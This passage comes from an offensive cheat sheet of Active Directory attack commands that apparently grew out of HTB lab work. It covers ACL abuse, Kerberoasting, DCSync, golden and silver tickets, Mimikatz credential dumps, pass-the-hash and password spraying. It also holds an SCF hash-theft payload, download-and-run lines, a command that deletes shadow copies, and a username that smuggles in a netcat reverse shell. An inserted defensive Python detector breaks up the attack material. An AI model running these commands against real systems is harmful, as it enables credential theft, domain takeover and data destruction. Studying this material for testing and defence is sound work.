## or net group "Domain Admins" maria /add /domain
net user maria /domain
  • Abusing ForceChangePassword

## ------------------| Reset password
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
Set-DomainUserPassword <UserName> -AccountPassword $pass -Verbose

## ------------------| Simple Powershell if you are on AD
Set-ADAccountPassword -Identity <UserName> -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)
  • Abusing GenericAll

## ------------------| Add member to another group
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\Herman',$pass)
Add-DomainGroupMember -Identity 'Backup_Admins' -Members Herman -Credential $cred
Get-DomainGroup -MemberIdentity Herman | select samaccountname
  • Abusing GenericWrite

## ------------------| Setup
## Credentials are optional when you already run as the user holding GenericWrite
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<UserName>', $pass)

## ------------------| Method I
## Set a service principal name on the target account and Kerberoast it (targeted Kerberoasting).
## The SPN must have a valid format, e.g. MSSQLSvc/<Domain>:1433
Set-DomainObject -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
## We can use the built-in binary : setspn -a MSSQLSvc/<Domain>:1433 <Domain>\<UserName>
## With creds : Set-DomainObject -Credential $cred -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
Get-DomainUser <UserNameToSetSPN> | Select serviceprincipalname
Get-DomainSPNTicket -SPN "MSSQLSvc/<Domain>:1433" -Credential $cred | fl
.\Rubeus.exe kerberoast /creduser:<Domain>\<UserName> /credpassword:Password123!

## ------------------| Method II
## Set the logon script (scriptPath); it runs at the target user's next interactive logon
cd C:\Windows\temp\
echo 'whoami > C:\Windows\temp\poc.txt' > foo.ps1
Set-DomainObject -Credential $cred -Identity <UserName> -SET @{scriptpath='C:\Windows\temp\foo.ps1'}
  • Abusing AddKeyCredentialLink

## ------------------| Setup
wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_Any/Whisker.exe
.\Whisker.exe add /target:<UserName>
## Whisker prints a Rubeus asktgt command (certificate + password, /getcredentials); running it returns the account's NT hash via PKINIT
evil-winrm -i <IP> -u <UserName> -H <Hash>

02. GetADUsers

impacket-GetADUsers -all -dc-ip <IP> <domain>/<user>
impacket-GetADUsers -all -dc-ip <IP> <domain>/<user> -hashes <LM:NT>

03. GetUserSPNs

## ------------------| Without a password prompt (empty password, or combine with -k / -hashes)
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -no-pass

## ------------------| With password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user>:<password>
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -hashes <LM:NT>

## ------------------| Use Kerberos authentication. Grabs credentials from ccache file
impacket-GetUserSPNs -request -k -no-pass -dc-host dc1.scrm.local scrm.local/ksimpson

04. GetNPUsers

## ------------------| Check Kerberos pre-authentication disabled?
impacket-GetNPUsers -dc-ip <IP> <domain>/<user> -no-pass    
impacket-GetNPUsers -dc-ip <IP> -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt <domain>/     

## ------------------| Common 
impacket-GetNPUsers -dc-ip <IP> -request '<domain>/'
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username>:<password>
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username> -hashes <LM:NT>

## ------------------| Get hashcat format
impacket-GetNPUsers -format hashcat -dc-ip <IP> -request '<domain>/'

05. BloodHound / SharpHound

## ------------------| Load SharpHound.ps1
## The PowerShell collector must match the BloodHound GUI version (4.0.3 here, pinned commit below)
## https://github.com/BloodHoundAD/BloodHound/releases/tag/4.0.3
wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/d8163c0650ada9ef4a6ebc5e2dc8f5fde566e73f/Collectors/SharpHound.ps1
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All

## ------------------| Collect info
.\SharpHound.exe -c all,GPOLocalGroup,LoggedOn
.\SharpHound.exe -c all -d <DomainName>
.\SharpHound.exe --CollectionMethods all,GPOLocalGroup,LoggedOn

## ------------------| Usage
 -s, --searchforest Search all available domains in the forest
--stealth           Stealth Collection (Prefer DCOnly whenever possible!)
--outputprefix      String to prepend to output file names
--memcache          Keep cache in memory and don't write to disk
--zipfilename       Filename for the zip
--zippassword       Password protects the zip with the specified password
-c, --collectionmethods    (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup,
                            Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly
  • BloodHound-Python

## ------------------| Dump domain info
pip3 install bloodhound
bloodhound-python -u <username> -p '<password>' -d <domain> -ns <IP> --dns-tcp -c All
  • LDAPDomainDump

## ------------------| Only Json output
ldapdomaindump --no-grep --no-html -o ldapinfo <IP> -u <domain>\\<username> -p <password>

## ------------------| Only HTML output
ldapdomaindump --no-json --no-grep -o ldapinfo <IP> -u <domain>\\<username> -p <password> 
## ------------------| Run bloodhound-python from a git checkout (same tool as above)
python3 bloodhound.py -d <domain> -u <username> -p '<password>' -gc <domain> -c all -ns <IP>

## ------------------| Usage
-u              Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.
-p              Password
-k              Use kerberos
--hashes        LM:NTLM hashes
-ns             Alternative name server to use for queries
--dns-tcp       Use TCP instead of UDP for DNS queries
--dns-timeout   DNS query timeout in seconds (default: 3)
-d              Domain to query.
-dc             Override which DC to query (hostname)
-gc             Override which GC to query (hostname)
-w              Number of workers for computer enumeration (default: 10)
-v              Enable verbose output
  • BloodHound / neo4j raw Cypher queries.

## ------------------| List all users
MATCH (u:User) return u
MATCH (u:User) return u LIMIT 10

## ------------------| List users with properties
MATCH (u:User) WHERE u.name CONTAINS "ADMIN" return u.name, u.displayname, u.description

## ------------------| Count computers by whether LAPS is enabled (haslaps true/false)
MATCH (c:Computer) RETURN c.haslaps, COUNT(*)

  • windapsearch

## Enumerate the domain over LDAP (works with an anonymous bind when the DC allows it)
/opt/windapsearch/windapsearch-linux-amd64 -d <IP> -m users --proxy 127.0.0.1:1080

  • Kerbrute

## ------------------| User enumeration (validates usernames via AS-REQ; no failed-logon lockouts)
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d <domain> --dc <IP>     

## ------------------| Password Spray
kerbrute passwordspray <usernames.txt> -d <domain> --dc <IP> '<password>'

08. RPCDump.py

impacket-rpcdump <IP>

## ------------------| Check if the Print Spooler service is exposed (MS-RPRN interface)
impacket-rpcdump <IP> | grep -A2 -B2 MS-RPRN

## One service that can be leveraged to escalate privileges in the domain is the Spooler service:
## it lets any authenticated user trigger authentication from the computer account of the host it
## runs on (PrinterBug/SpoolSample). That authentication can then be relayed, or captured and cracked.

  • Covenant (Grunt) task commands

## SharpUp runs privilege escalation checks on the host
sharpup audit

## shellcmd runs a shell command through the grunt
shellcmd whoami

## Import a PowerShell script into the grunt (pick PowerView.ps1 in the file dialog)
PowerShellImport

## Run PowerShell with the imported script loaded
PowerShell Get-DomainComputer | Select name

## Kerberoast users (run MakeToken first so the request is made as the right identity)
Rubeus kerberoast
Kerberoast <UserName> hashcat

## Impersonate a user (logon as) with the MakeToken command
MakeToken <username> <domainname> <password> LOGON32_LOGON_INTERACTIVE

## DCSync
DCSync Administrator

  • Add a DNS record with dnstool.py (krbrelayx)

## ------------------| Add DNS Record
python3 dnstool.py -u 'intelligence\tiffany.molina' -p <password> -r h4rithd -a add -t A -d <myIP> <RemoteIP>       

#### -u intelligence\Tiffany.Molina - The user to authenticate as;
#### -p <password> - The user’s password;
#### --action add - Adding a new record;
#### --record h4rithd - The domain to add;
#### --data <MyIP> - The data to add, in this case, the IP to resolve h4rithd to;
#### --type A - The type of record to add.

## ------------------| Check if it success
nslookup 
> server <RemoteIP>
> h4rithd.intelligence.htb 
## If it display my ip; we are good!!

11. Steal Hash (capture NTLM authentication)

## ------------------| Using Responder
sudo responder -I tun0

## ------------------| Using Metasploit
use auxiliary/server/capture/http_ntlm
set SRVPORT 80
set URIPATH /
set SRVHOST <MyIP>
set JOHNPWFILE passwords
run

## ------------------| If the account has ReadGMSAPassword over a gMSA, dump its NT hash
python3 gMSADumper.py -u <user> -p <password_or_LM:NT> -l <ldap_server_ip> -d <domain>

## ------------------| Verify the hash with crackmapexec
crackmapexec smb 10.10.10.248 -u svc_int$ -H b98d4cef68f72a98dfeed732d1b1abca

## With the service account's hash you can forge a silver ticket for the services it runs (see 17. Silver Ticket).

13. getTGT.py

wget https://raw.githubusercontent.com/fortra/impacket/master/examples/getTGT.py
python3 getTGT.py <domain>/<username>:<password>

export KRB5CCNAME=<username>.ccache
klist 

## ------------------| Get Domain SID
impacket-getPac -targetUser Administrator <Domain>/<User>:<Password>

15. AS-REP Roasting

## ------------------| With Rubeus
.\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat

## ------------------| With Impacket
impacket-GetNPUsers -dc-ip <IP> <domain>/<user> -no-pass    
impacket-GetNPUsers -dc-ip <IP> -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt <domain>/     

16. DCSync Attack

## ------------------| Prerequisite
## An account with replication rights: Domain Admins / Enterprise Admins / Administrators by default,
## or any principal granted DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain

## ------------------| Ask for the credentials of KRBTGT (needed for a golden ticket)
.\mimikatz.exe "lsadump::dcsync" "/domain:<DOMAIN> /user:krbtgt" "exit" >> DCSync.out

## ------------------| Ask for the credentials of the h4rithd user
.\mimikatz.exe "lsadump::dcsync" "/domain:<DOMAIN> /user:h4rithd" "exit" >> DCSync.out

17. Silver Ticket

  • Prerequisite

## Domain Name                   --> systeminfo | findstr /B "Domain"
## Password for service account  --> perform kerberoasting or use mimikatz to dump the hash

## ------------------| Convert password to hash 
.\Rubeus.exe hash /password:<password>
  • PassTheTicket with Rubeus

.\Rubeus.exe silver /service:<servicePrincipalName> /rc4:<NTLM-HASH> /sid:<domain_sid> /user:<NonExistentUser> /domain:<domain_name> /ptt
  • PassTheTicket with mimikatz

## ------------------| Flush & inject tickets
.\mimikatz.exe "kerberos::purge" "exit"
.\mimikatz.exe "kerberos::golden /user:<NonExistentUser> /domain:<domain_name> /sid:<domain_sid> /target:<FQHN_service_account> /service:HTTP /rc4:<ntlm_hash> /ptt" "exit" >> mimikatz-silver.out
## /service: is the service class of the SPN (HTTP, CIFS, MSSQLSvc, ...); e.g. for MSSQLSvc/SqlServer.htb.com use /target:SqlServer.htb.com /service:MSSQLSvc
## ------------------| Get Shell
.\PsExec.exe -accepteula \\<FQHN_service_account> cmd 
  • PassTheTicket with python

## ------------------| Need to sync date
sudo ntpdate <RemoteIP>

## ------------------| Get Silver Ticket
python3 /usr/share/doc/python3-impacket/examples/ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -user-id 500 -spn <FQHN_service_account> Administrator
impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :<ntlm_hash> -impersonate Administrator <domain_name>/<FQHN_service_account>

#### -dc-ip 10.10.10.248
#### -spn - To get the SPN, that’s in the Node Info -> Node Properties section for the svc_int user in Bloodhound        
#### -hashes - the NTLM I collected earlier using gMSADumper.py
#### -impersonate - the user I want a ticket for

## ------------------| Login via silver ticket 
export KRB5CCNAME=Administrator.ccache  
impacket-psexec -k -no-pass Administrator@dc.intelligence.htb

18. Golden Ticket

  • Prerequisite

## Impersonate user 
## Domain Name    --> systeminfo | findstr /B "Domain"
## SID            --> whoami /user  or Get-ADDomain <DOMAIN_NAME>
## Domain KRBTGT Account NTLM password hash    --> DCSync Attack
  • With impacket

## ------------------| Get Domain SID
impacket-lookupsid [[domain/]username[:password]@]<IP>

## ------------------| Extract Krbtgt hash
impacket-secretsdump [[domain/]username[:password]@]<IP> -outputfile krb -user-status
impacket-secretsdump [[domain/]username[:password]@]<IP> -outputfile krb -user-status -just-dc-user krbtgt -just-dc-ntlm

## ------------------| Generate the TGT 
## [NTLM Hash]
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
## [AES Key]
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

## ------------------| Convert kirbi,ccache
impacket-ticketConverter ticket.kirbi /tmp/ticket.ccache
impacket-ticketConverter ticket.ccache /tmp/ticket.kirbi

## ------------------| Set the ticket for impacket use
## impacket reads ccache files only; convert a .kirbi with impacket-ticketConverter first
export KRB5CCNAME=/tmp/ticket.ccache
klist

## ------------------| Execute remote commands with any of the following by using the TGT
## !! Remember do not use IP address. always use hostname.domain
python psexec.py <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass
impacket-psexec <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass

## ------------------| Fix errors
## KRB_AP_ERR_SKEW(Clock skew too great) --> sudo ntpdate <DCIP>
## ------------------| Pass the Ticket [/ptt]
## If you use /ptt at the end of the command when generating the ticket,
## it is injected into the current session; then run misc::cmd and use psexec.exe to get a cmd shell.

## ------------------| Generate the ticket
## If you do not use /ptt at the end of the command when you generate the ticket,
## it will store the ticket as a ticket.kirbi file.
## This TGT is valid for 10 years by default.

## ------------------| RID
## You can use /id:500 to generate a ticket for the built-in Administrator RID

## ------------------| To generate the TGT
## [NTLM Hash]
kerberos::golden /user:h4rithd /domain:<domain_name> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt
kerberos::golden /user:h4rithd /domain:<domain_name> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /id:500 /ptt
kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
## [AES 128 key]
kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /ptt
## [AES 256 key] ** stronger encryption and probably stealthier, since AES256 is the default used by Microsoft
kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /ptt

## ------------------| Inject TGT with Mimikatz
kerberos::ptt <ticket_kirbi_file>
misc::cmd

## ------------------| Inject TGT with Rubeus
Rubeus.exe ptt /ticket:<ticket_kirbi_file>

## ------------------| Get shell
misc::cmd
psexec.exe \\<DC_HostName> cmd.exe
pushd \\<DC_HostName>\C$
  • With Metasploit

## ------------------| Enumerate krbtgt hash & SID of the domain controller
load kiwi
dcsync_ntlm krbtgt

## ------------------| Collect other information
shell
ipconfig /all
nbtstat -a <DNS_SERVERS_IP>

## ------------------| Create ticket
golden_ticket_create -d <DOMAIN> -u <USER> -s <DOMAIN-SID> -k <HASH> -t /tmp/ticket.kirbi

19. Kerberoasting

  • With GetUserSPNs.ps1

## ------------------| List all SPNs
cp /usr/share/kerberoast/GetUserSPNs.ps1 .
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/GetUserSPNs.ps1')
## With PowerView
Get-NetUser | Where-Object {$_.servicePrincipalName} | select samaccountname,serviceprincipalname | fl

## ------------------| Request ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <ServicePrincipalNames>        
## The requested service ticket is then stored in memory

## ------------------| Use mimikatz to save ticket to disk
kerberos::list /export

## ------------------| Crack hash
sudo apt-get install kerberoast
python3 /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

## ------------------| If you are willing to crack with john
git clone https://github.com/nidem/kerberoast
python3 kerberoast/kirbi2john.py ticket.kirbi > john-ticket.txt
john --format=krb5tgs john-ticket.txt -wordlist=/usr/share/wordlists/rockyou.txt
  • With Invoke-Kerberoast.ps1

## ------------------| Download
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1            

## ------------------| Export ticket
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Format Hashcat | Select-Object Hash | ConvertTo-Csv -NoTypeInformation | Out-File hashes.csv             

## ------------------| Crack hash
hashcat -m 13100 -a0 hash.txt /usr/share/wordlists/rockyou.txt -O
  • With Rubeus

## ------------------| Export ticket
.\Rubeus.exe kerberoast /simple /outfile:hashes.txt
.\Rubeus.exe kerberoast /creduser:<Domain>\<UserName> /credpassword:Password123! /outfile:hashes.txt

## ------------------| Crack hash
hashcat -m 13100 -a0 hashes.txt /usr/share/wordlists/rockyou.txt -O
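The defender-side view of sections 15 and 19, as an added example that is not part of the original notes: both techniques leave 4768/4769 Security events on the DC, and the RC4 encryption type (0x17) plus a burst of distinct SPNs from one account is what to look for. The event records below are constructed samples; the field names are assumptions modelled on the 4768/4769 event fields.

```python
"""Added example: flag AS-REP roasting and Kerberoasting patterns in
Windows Security events 4768 (TGT request) and 4769 (service ticket request).
The events are constructed samples, not real DC logs."""
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES256 is 0x12, AES128 0x11
NO_PREAUTH = 0      # 4768 PreAuthType 0 = logon without pre-authentication

# Constructed sample events (subset of the 4768/4769 fields).
EVENTS = [
    {"id": 4768, "account": "svc_backup", "preauth": NO_PREAUTH, "etype": RC4_HMAC, "src": "10.0.0.50"},
    {"id": 4768, "account": "alice", "preauth": 2, "etype": "0x12", "src": "10.0.0.21"},
    {"id": 4769, "account": "alice", "service": "MSSQLSvc/SqlServer.htb.com", "etype": RC4_HMAC, "src": "10.0.0.21"},
    {"id": 4769, "account": "alice", "service": "HTTP/web01.htb.com", "etype": RC4_HMAC, "src": "10.0.0.21"},
    {"id": 4769, "account": "alice", "service": "CIFS/fs01.htb.com", "etype": RC4_HMAC, "src": "10.0.0.21"},
    {"id": 4769, "account": "bob", "service": "WS01$", "etype": "0x12", "src": "10.0.0.22"},
    {"id": 4769, "account": "bob", "service": "krbtgt", "etype": "0x12", "src": "10.0.0.22"},
]


def asrep_roast_candidates(events):
    """Accounts whose TGT was issued without pre-auth and encrypted with RC4:
    exactly the AS-REP material that GetNPUsers / Rubeus asreproast collect
    for offline cracking."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768
                   and e["preauth"] == NO_PREAUTH
                   and e["etype"] == RC4_HMAC})


def kerberoast_candidates(events, threshold=3):
    """Requesting accounts that pulled RC4 service tickets for at least
    `threshold` distinct user-account SPNs. Machine accounts ($) and the
    krbtgt service are skipped: their keys are not crackable by wordlist and
    would only add noise."""
    spns_by_account = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        spns_by_account[e["account"]].add(svc)
    return {acct: sorted(spns) for acct, spns in spns_by_account.items()
            if len(spns) >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable accounts:", asrep_roast_candidates(EVENTS))
    print("Kerberoasting suspects:", kerberoast_candidates(EVENTS))
```

In a domain where AES is the default, a legitimate client almost never requests RC4 tickets, so the etype filter alone carries most of the signal; the SPN-count threshold then separates tooling from an isolated legacy client.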

20. Mimikatz

  • Dump all users' NTLM hashes.

.\mimikatz.exe "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out
.\mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit" >> mimikatz-lsa.out
  • Dump passwords using lsass

## ------------------| Using Mimikatz
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-lsass.out       

## ------------------| If you have an lsass minidump (lsass.DMP) or Rekall dump
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
  • Export Kerberos tickets.

kerberos::list /export
  • Extract krbtgt Hash

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit" >> mimikatz-krbtgt.out       
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<DOMAIN> /user:krbtgt" "exit" >> mimikatz-krbtgt2.out        
  • OverPassTheHash

## ------------------| Login as another user
privilege::debug
sekurlsa::pth /user:[USER] /domain:[DOMAIN] /ntlm:[NTLM HASH] /run:"powershell -EncodedCommand SQBF..DFSS=="      

## ------------------| Login to Domain Controller machine
net use \\<DC>
.\PsExec.exe -accepteula \\<DC> cmd.exe 
  • Set password for account

.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"

## ------------------| Mimikatz module reference
CRYPTO::Certificates    # list/export certificates
KERBEROS::Golden        # create golden/silver/trust tickets
KERBEROS::List          # list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user's tickets. Similar to "klist".
KERBEROS::PTT           # pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSync         # ask a DC to synchronize an object (get password data for an account). No need to run code on the DC.
LSADUMP::LSA            # ask the LSA server to retrieve SAM/AD enterprise credentials (normal, patch on the fly or inject). Used to dump all Active Directory domain credentials from a Domain Controller or an lsass.dmp file. Also used to get a specific account's credential such as krbtgt with the parameter /name: "/name:krbtgt"
LSADUMP::SAM            # get the SysKey to decrypt SAM entries (from registry or hive). Connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
LSADUMP::Trust          # ask the LSA server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
MISC::AddSid            # add to SIDHistory of a user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID::modify as of May 6th, 2016.
MISC::MemSSP            # inject a malicious Windows SSP to log locally authenticated credentials.
MISC::Skeleton          # inject a Skeleton Key into the LSASS process on a Domain Controller. All authentication to the patched DC then accepts a "master password" (the Skeleton Key) as well as the usual password.
PRIVILEGE::Debug        # get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Ekeys         # list Kerberos encryption keys
SEKURLSA::Kerberos      # list Kerberos credentials for all authenticated users (including services and the computer account)
SEKURLSA::Krbtgt        # get Domain Kerberos service account (KRBTGT) password data
SEKURLSA::LogonPasswords # list all available provider credentials. Usually shows recently logged-on user and computer credentials.
SEKURLSA::Pth           # Pass-the-Hash and Over-Pass-the-Hash
SEKURLSA::Tickets       # list all available Kerberos tickets for all recently authenticated users, including services running under a user account and the local computer's AD computer account. Unlike kerberos::list, sekurlsa reads memory and is not subject to key export restrictions, so it can access tickets of other sessions (users).
TOKEN::List             # list all tokens on the system
TOKEN::Elevate          # impersonate a token. Used to elevate to SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate /domainadmin # impersonate a token with Domain Admin credentials.

21. Pass The Hash [PTH] - extended

## ------------------| impacket-psexec
impacket-psexec <USER>@<IP> -hashes <LM>:<NTLM>

## ------------------| pth-winexe
export SMBHASH=<LM>:<NTLM>
pth-winexe -U administrator //192.168.1.101 cmd
pth-winexe -U administrator%<LM>:<NTLM> //192.168.0.101 cmd

## ------------------| Metasploit
use exploit/windows/smb/psexec
set SMBPass <LM>:<NTLM>

## ------------------| wmiexec.py
wmiexec.py --hashes <LM>:<NTLM> <DOMAIN>/<USER>@CORPDC01 "vssadmin delete shadows /all /quiet" > out.txt

## ------------------| PsExec.exe
PsExec.exe -accepteula \\<HOST> -u <DOMAIN>\<USER> -p <LM>:<NTLM> cmd.exe
PsExec.exe -accepteula \\<HOST> -s -u <DOMAIN>\<USER> -p <LM>:<NTLM> cmd.exe

## ------------------| Mimikatz
Mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<USER> /ntlm:<NTLM> /domain:<DOMAIN>" "exit"

## ------------------| xfreerdp 
xfreerdp /u:<USER> /d:<DOMAIN> /pth:<LM>:<NTLM> /v:<IP>

## ------------------| Add fake machine
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Import-Module Powermad.ps1
New-MachineAccount -MachineAccount <FakeComputerName> -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

23. Password Spraying

  • Low and Slow Password Spraying

wget https://raw.githubusercontent.com/ZilentJack/Spray-Passwords/master/Spray-Passwords.ps1          
.\Spray-Passwords.ps1 -Pass Password123! -Admin
## ------------------| Setup
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh                                                                                                                                   

## ------------------| SMB Portal  
spray.sh -smb <targetIP> <USERNAMEs.TXT> <PASSWORDS.TXT> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

## ------------------| OWA Portal
spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>

03. Other commands / Exploits

## ------------------| Reconnaissance
## Upload following files to compromised machine.
wget https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
wget https://github.com/samratashok/ADModule/raw/master/Microsoft.ActiveDirectory.Management.dll
. .\Import-ActiveDirectory.ps1
Import-ActiveDirectory -ActiveDirectoryModule C:\Full\Path\Microsoft.ActiveDirectory.Management.dll
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

## ------------------| Exploitation Printer Bug
wget https://raw.githubusercontent.com/h4rithd/PrecompiledBinaries/main/Rubeus/Rubeus.exe
wget https://raw.githubusercontent.com/h4rithd/PrecompiledBinaries/main/SpoolSample/MS-RPRN.exe

./Rubeus.exe monitor /interval:5 /nowrap ## Terminal 01 (shell 01)
./MS-RPRN.exe DC01 DC02 ## Terminal 02 (shell 02) [need nt authority\system]

## DC01 is the domain controller we want to compromise.
## DC02 is the machine with delegation enabled that we control.
tasklist /SVC | findstr Rubeus.exe
taskkill /F /PID <PID>

## ------------------| Get TGT
## [need nt authority\system]
./Rubeus.exe ptt /ticket:doIFyDCCBcSgAw.....sdoIFyDC== 
./Rubeus.exe klist

## ------------------| DCSync 
./mimikatz.exe "lsadump::dcsync" "/user:<DOMAIN>\krbtgt" "exit"
## ------------------| Identify the vulnerability
### If you have GenericAll/GenericWrite/Write on a Computer object, you are welcome!!
### Check whether ms-DS-MachineAccountQuota is still 10 (the default), i.e. users may add machine accounts
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select ms-ds-machineaccountquota
### Check that the DC OS is Windows Server 2012 or newer
Get-DomainController | select OSVersion

## ------------------| Exploit [PART I]
Import-Module ./Powermad.ps1
### Create new fake computer object inside the domain
New-MachineAccount -MachineAccount FAKEMACHINE -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer FAKEMACHINE
### Using AD PowerShell module, give the new fake computer object the Constrained Delegation privilege.
Set-ADComputer <TargetComputer> -PrincipalsAllowedToDelegateToAccount FAKEMACHINE$
Get-ADComputer <TargetComputer> -Properties PrincipalsAllowedToDelegateToAccount

## ------------------| Exploit [PART II]
### Performing a complete S4U attack
.\Rubeus.exe hash /password:123456 /user:FAKEMACHINE$ /domain:domain.local
### Note-down the aes256_cts_hmac_sha1 hash

## ------------------| Exploit [PART III]
### Generate a ccache service ticket and use KRB5CCNAME to pass the ccache file for the requested service.
impacket-getST domain.local/FAKEMACHINE -dc-ip <IP> -impersonate administrator -spn http/victim.domain.local -aesKey <AES_KEY>
export KRB5CCNAME=administrator.ccache
### We must set /etc/hosts file to map the domain name & hostname to the victim’s IP address
impacket-smbexec domain.local/administrator@victim.domain.local -no-pass -k
impacket-psexec domain.local/administrator@victim.domain.local -no-pass -k
  • Mount shares to linux machine

## ------------------| Setup
sudo apt-get install cifs-utils
sudo mkdir /mnt/shares
sudo chmod 777 /mnt/shares

## ------------------| Mount shares
sudo mount -t cifs //$IP/Users /mnt/shares
sudo mount -t cifs -o 'username=L.Frost,password=welcome2019' //$IP/Users /mnt/shares                    

## ------------------| Mount Options
-o 'username=L.Frost,password=welcome2019'
-o 'vers=2.0' ## can be changed to vers=1.0 or vers=3.0
-o 'dir_mode=0755,file_mode=0755'

## ------------------| Usage of Thunar 
thunar smb://$IP/
  • Mounting VHD file on Kali Linux through remote share

apt-get install libguestfs-tools
apt-get install cifs-utils

guestmount --add /mnt/remote/path/to/vhdfile.vhd --inspector --ro /mnt/vhd -v
  • SCF File Attacks

## ------------------| Create payload (nano stealhash.scf)
[Shell]
Command=2
IconFile=\\<YourIP>\share\h4rithd.ico
[Taskbar]
Command=ToggleDesktop

## ------------------| Start responder 
responder -I tun0
# Then copy the scf file to users desktop
  • Get Deleted items from AD

Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *    
  • If you get STATUS_PASSWORD_MUST_CHANGE, reset the SMB password

## ------------------| If you are from linux env
smbpasswd -U <UserName> -r <RemoteMachineIP>

## ------------------| If you are from Windows env (Powershell)
$username = 'phinchley'
$dc = 'dc.lab.hinchley.net'

$old = 'Passw0rd1#'
$new = 'Something!'

$code = @'
[DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
public static extern bool NetUserChangePassword(string domain, string username, string oldpassword, string newpassword);
'@

$NetApi32 = Add-Type -MemberDefinition $code -Name 'NetApi32' -Namespace 'Win32' -PassThru

if ($result = $NetApi32::NetUserChangePassword($dc, $username, $old, $new)) {
  write-host 'Password change failed.'
} else {
  write-host 'Password change successful.'
}
crackmapexec smb --shares <IP> -u './=`nohup nc -e /bin/sh 10.10.14.17 4545`' -p ''
  • SambaCry | CVE-2017-7494 | 3.5.0 and 3.6.0

## ------------------| Setup
git clone https://github.com/opsxcq/exploit-CVE-2017-7494 && cd exploit-CVE-2017-7494
sudo pip install virtualenv
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket

## ------------------| Exploit
